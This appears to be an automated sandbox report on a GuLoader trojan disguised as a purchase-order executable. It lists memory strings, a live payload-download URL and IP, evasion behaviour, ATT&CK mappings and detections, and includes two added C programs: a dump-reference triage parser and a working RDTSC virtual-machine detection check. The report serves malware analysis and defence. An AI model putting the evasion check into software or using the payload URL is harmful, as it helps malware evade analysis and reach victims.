      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249913342.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3249753104.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269271168.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2970031415.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3009043227.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288676137.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3309422923.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3288465328.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bind
      Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070130873.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3028767017.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3009043227.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3070453625.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3100164919.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3008954123.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.2989432317.00000000075DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binlIa
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353408541.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3394670154.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3353581442.00000000075DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://designcirclekw.com/dmin/controller/extension/extension/zXcMABFvBCAfEn173.binBFvBCAfEn173.bin
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://designcirclekw.com/l
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3162090904.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3122796477.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328739652.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3100164919.00000000075DC000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3328883453.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3161939016.00000000075D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://designcirclekw.com/ler/extension/extension/zXcMABFvBCAfEn173.bin
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142803072.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181377278.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3142595518.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201010339.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220354716.00000000075D8000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181585136.00000000075DB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220645532.00000000075DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://designcirclekw.com/t
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://designcirclekw.com/v
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> each of the 56 client ports 49976 through 50031
Source: unknown | Network traffic detected: HTTP traffic on each of the client ports 49976 through 50031 -> 443
Source: unknown | HTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8 on client ports 49976, 49977, 49983, 49984, 49985, 49987, 49990, 49995, 49996, 49997, 50008, 50009, 50010 and 50027, version: TLS 1.2
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_00405063 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_00405063
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004030EC
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_004048A2 | 0_2_004048A2
Source: PO-10212024168877 PNG2023-W101.exe | Static PE information: invalid certificate
Source: PO-10212024168877 PNG2023-W101.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal72.troj.evad.winEXE@3/11@1/1
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004030EC
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_0040432F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA | 0_2_0040432F
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar | 0_2_0040205E
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | File created: C:\Users\user\AppData\Local\demarkerede
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | File created: C:\Users\user\AppData\Local\Temp\nsp7D8F.tmp
Source: PO-10212024168877 PNG2023-W101.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PO-10212024168877 PNG2023-W101.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | File read: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
Source: unknown | Process created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Process created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Process created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Sections loaded, in the order reported: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll (three times), textshaping.dll, profapi.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: PO-10212024168877 PNG2023-W101.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
Source: Yara match | File source: 00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2614036861.0000000006688000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA | 0_2_10001A5D
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_10002D20 push eax; ret | 0_2_10002D4E
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Process information set: NOOPENFILEERRORBOX (reported three times)
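The memory-dump references cited by the "String found in binary or memory" lines above and by the two Yara match lines in this section say where in the process each match was found, and that location matters: a GuLoader Yara hit in private memory that is both writable and executable is the decrypted shellcode stage, whereas a URL string in image-backed memory usually belongs to a loaded Windows module. The C program below is an added example written for this page, not code from the report or from Joe Sandbox. The field layout it assumes for a reference (pid.phase.sequence.base.protect.?.type.?.sdmp, reading 0x04, 0x08 and 0x40 as PAGE_READWRITE, PAGE_WRITECOPY and PAGE_EXECUTE_READWRITE, and 0x20000 and 0x1000000 as MEM_PRIVATE and MEM_IMAGE) is inferred from the values on this page matching the Windows MEMORY_BASIC_INFORMATION constants; it is an assumption, not something the report documents. The sample tokens in main() are copied from the evidence lines on this page.

```c
/* dump_ref_triage.c: added example, not from the report or from Joe Sandbox.
 * Parses the ".sdmp" memory-dump references cited in the evidence lines,
 * flags dumps that sit in private RWX memory (payload candidates), and pulls
 * the host out of a "String found in binary or memory" URL.
 * ASSUMED layout: pid.phase.sequence.base.protect.?.type.?.sdmp, with the
 * protect/type fields holding Windows memory constants (not documented here). */
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

#define PAGE_READWRITE          0x04u
#define PAGE_WRITECOPY          0x08u
#define PAGE_EXECUTE_READWRITE  0x40u
#define MEM_PRIVATE             0x20000u
#define MEM_IMAGE               0x1000000u

typedef struct {
    unsigned pid, phase, seq;
    uint64_t base;
    unsigned protect, unk5, type, unk7;   /* unk5/unk7: meaning not known */
} dump_ref;

/* Parse one reference token; returns false if it does not have the 8 fields. */
bool parse_dump_ref(const char *token, dump_ref *out) {
    unsigned long long base = 0;
    int n = sscanf(token, "%x.%x.%u.%llx.%x.%x.%x.%x.sdmp",
                   &out->pid, &out->phase, &out->seq, &base,
                   &out->protect, &out->unk5, &out->type, &out->unk7);
    out->base = (uint64_t)base;
    return n == 8;
}

/* Private (VirtualAlloc/heap) memory that is writable AND executable is where an
   injected or decrypted stage lives; a Yara hit there outranks one in a module. */
bool is_private_rwx(const dump_ref *r) {
    return r->type == MEM_PRIVATE && r->protect == PAGE_EXECUTE_READWRITE;
}

/* Image-backed regions hold strings of loaded modules, not runtime data. */
bool is_image_backed(const dump_ref *r) {
    return r->type == MEM_IMAGE;
}

/* Copy the host part of the first http(s) URL in `line` into `host`. */
bool url_host(const char *line, char *host, size_t cap) {
    const char *p = strstr(line, "://");
    if (!p) return false;
    p += 3;
    size_t i = 0;
    while (p[i] && p[i] != '/' && p[i] != ':' && p[i] != ' ' && i + 1 < cap) {
        host[i] = p[i];
        i++;
    }
    host[i] = '\0';
    return i > 0;
}

int main(void) {
    /* Constructed input: reference tokens copied from this report's evidence lines. */
    const char *refs[] = {
        "00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmp", /* Yara match */
        "00000006.00000003.3372975726.00000000075D8000.00000004.00000020.00020000.00000000.sdmp", /* C2 URL string */
        "00000006.00000001.2607777042.0000000000649000.00000008.00000001.01000000.00000006.sdmp", /* live.net string */
    };
    for (size_t i = 0; i < sizeof refs / sizeof refs[0]; i++) {
        dump_ref r;
        if (!parse_dump_ref(refs[i], &r)) { printf("unparsed: %s\n", refs[i]); continue; }
        printf("pid %u phase %u base 0x%llx protect 0x%x type 0x%x -> %s\n",
               r.pid, r.phase, (unsigned long long)r.base, r.protect, r.type,
               is_private_rwx(&r) ? "PRIVATE RWX (payload candidate)"
             : is_image_backed(&r) ? "image-backed (module string)" : "other");
    }
    char host[64];
    if (url_host("https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.bin",
                 host, sizeof host))
        printf("host: %s\n", host);
    return 0;
}
```

Run against the three tokens, the Yara match at base 0x3648000 in process 6 is the only private RWX region, the designcirclekw.com strings sit in private read-write heap memory (runtime data, consistent with a download URL assembled at run time), and the live.net string comes from an image-backed region, so it should not be treated as an indicator without further checks.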

      Malware Analysis System Evasion

      barindex
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | API/Special instruction interceptor: Address: 7056CCE
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | API/Special instruction interceptor: Address: 4016CCE
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | RDTSC instruction interceptor: First address: 6FFA451 second address: 6FFA451 instructions: 0x00000000 rdtsc; 0x00000002 test cx, dx; 0x00000005 cmp ebx, ecx; 0x00000007 jc 00007F2D3524E3E3h; 0x00000009 test dh, ch; 0x0000000b test ebx, eax; 0x0000000d inc ebp; 0x0000000e inc ebx; 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | RDTSC instruction interceptor: First address: 3FBA451 second address: 3FBA451 instructions: 0x00000000 rdtsc; 0x00000002 test cx, dx; 0x00000005 cmp ebx, ecx; 0x00000007 jc 00007F2D34BE3023h; 0x00000009 test dh, ch; 0x0000000b test ebx, eax; 0x0000000d inc ebp; 0x0000000e inc ebx; 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe TID: 6768 | Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe TID: 6768 | Thread sleep time: -550000s >= -30000s
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Last function: Thread delayed (reported twice)
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_00406010 FindFirstFileA,FindClose | 0_2_00406010
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_004055AE
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_00402688 FindFirstFileA | 0_2_00402688
Source: PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3181486135.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3122910329.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3269183422.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3220490283.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3201099129.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3373052656.00000000075CB000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000002.3912621480.0000000007568000.00000004.00000020.00020000.00000000.sdmp, PO-10212024168877 PNG2023-W101.exe, 00000006.00000003.3102891267.00000000075CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | API call chain: ExitProcess graph end node | graph_0-4186
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | API call chain: ExitProcess graph end node | graph_0-4335
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA | 0_2_10001A5D
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Process created: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe | Code function: 0_2_00405D2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA | 0_2_00405D2E
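The two RDTSC interceptor lines in this section show the shape of the sample's virtualization check: rdtsc, a few cheap filler instructions (test, cmp, inc) and a conditional jump, then rdtsc again. The delta between the two reads is a handful of cycles on bare metal but jumps by orders of magnitude when a hypervisor traps RDTSC or when an instrumented sandbox intercepts it. The C program below is an added example written for this page, not code recovered from the sample; it reproduces that check in readable form. The threshold of 1000 cycles and the minimum-of-N sampling are this example's own choices (the sample's threshold cannot be read from the lines shown), and on non-x86 builds it substitutes a nanosecond clock so the program still compiles, which is a stand-in and not the technique itself.

```c
/* rdtsc_vm_check.c: added example, not code from the sample or the report.
 * Reproduces the rdtsc; <filler>; rdtsc timing check the interceptor lines
 * record. Threshold and sample count are this example's assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* Non-x86 fallback so the example still builds: a nanosecond clock stands in
   for the time-stamp counter (assumption; not what the sample does). */
#include <time.h>
static inline uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One measurement: mirrors rdtsc; a few cheap instructions; rdtsc. */
uint64_t tsc_delta_once(void) {
    uint64_t t0 = read_tsc();
    /* Filler the compiler cannot delete, standing in for the sample's
       test/cmp/inc sequence between the two reads. */
    volatile uint32_t sink = 0;
    for (int i = 0; i < 8; i++) sink += (uint32_t)i;
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Minimum over several samples removes interrupt and scheduling noise, so
   only a systematic cost (a hypervisor exit or a sandbox interception on
   every rdtsc) survives. Taking the minimum is this example's refinement. */
uint64_t tsc_delta_min(int samples) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) {
        uint64_t d = tsc_delta_once();
        if (d < best) best = d;
    }
    return best;
}

/* The decision the sample's jc makes after the second rdtsc. */
bool delta_looks_virtualized(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int main(void) {
    const uint64_t threshold = 1000;   /* assumed; tune per CPU generation */
    uint64_t d = tsc_delta_min(1000);
    printf("min rdtsc delta over 1000 samples: %llu -> %s\n",
           (unsigned long long)d,
           delta_looks_virtualized(d, threshold) ? "looks virtualized"
                                                 : "looks native");
    return 0;
}
```

A hypervisor that passes RDTSC through with TSC offsetting yields native-looking deltas, so this check is weak against production VMs; what it reliably catches is an analysis environment that traps or single-steps the instruction, which is exactly the interception the lines above record. From the defender's side, the rdtsc pair with only a few bytes between the reads is the pattern to look for in memory scans of the unpacked stage.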
MITRE ATT&CK matrix: techniques the report maps to the sample, grouped by tactic, with the count shown by the report in parentheses. No technique is mapped under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement or Exfiltration.

Execution: Native API (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (1); File and Directory Discovery (2); System Information Discovery (23)
Collection: Archive Collected Data (1); Clipboard Data (1)
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)
Impact: System Shutdown/Reboot (1)
Antivirus detection (Source | Detection | Scanner | Label):
PO-10212024168877 PNG2023-W101.exe | 53% | ReversingLabs | Win32.Trojan.Guloader
PO-10212024168877 PNG2023-W101.exe | 100% | Joe Sandbox ML
Dropped file C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll | 0% | ReversingLabs
No Antivirus matches (the remaining two scan categories)
URL reputation (Source | Detection | Scanner | Label):
http://nsis.sf.net/NSIS_Error | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
      NameIPActiveMaliciousAntivirus DetectionReputation
      designcirclekw.com
      62.215.181.250
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://designcirclekw.com/admin/controller/extension/extension/zXcMABFvBCAfEn173.binfalse
          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
62.215.181.250 | designcirclekw.com | Kuwait | 21050 | FAST-TELCOKW | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544856
Start date and time: 2024-10-29 20:34:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO-10212024168877 PNG2023-W101.exe
Detection: MAL
Classification: mal72.troj.evad.winEXE@3/11@1/1
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 45
• Number of non-executed functions: 29
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: PO-10212024168877 PNG2023-W101.exe
Time | Type | Description
15:37:35 | API Interceptor | 55x Sleep call for process: PO-10212024168877 PNG2023-W101.exe modified
                                                No context
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FAST-TELCOKW | 6DroQ0jTFY.elf | malicious | Mirai | 62.215.147.81
 | na.elf | malicious | Mirai | 62.215.147.66
 | na.elf | malicious | Mirai | 62.215.147.73
 | na.elf | malicious | Mirai | 62.215.147.85
 | jade.mips.elf | malicious | Mirai | 62.215.172.72
 | SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elf | malicious | Mirai | 62.215.196.18
 | mirai.arm.elf | malicious | Mirai | 83.96.72.3
 | firmware.armv7l.elf | malicious | Unknown | 83.96.34.117
 | jQ0zXV2d1X.elf | malicious | Mirai | 62.215.92.250
 | sora.x86.elf | malicious | Mirai | 62.215.147.92
Match | Associated Sample Name / URL | Detection | Threat Name | Context
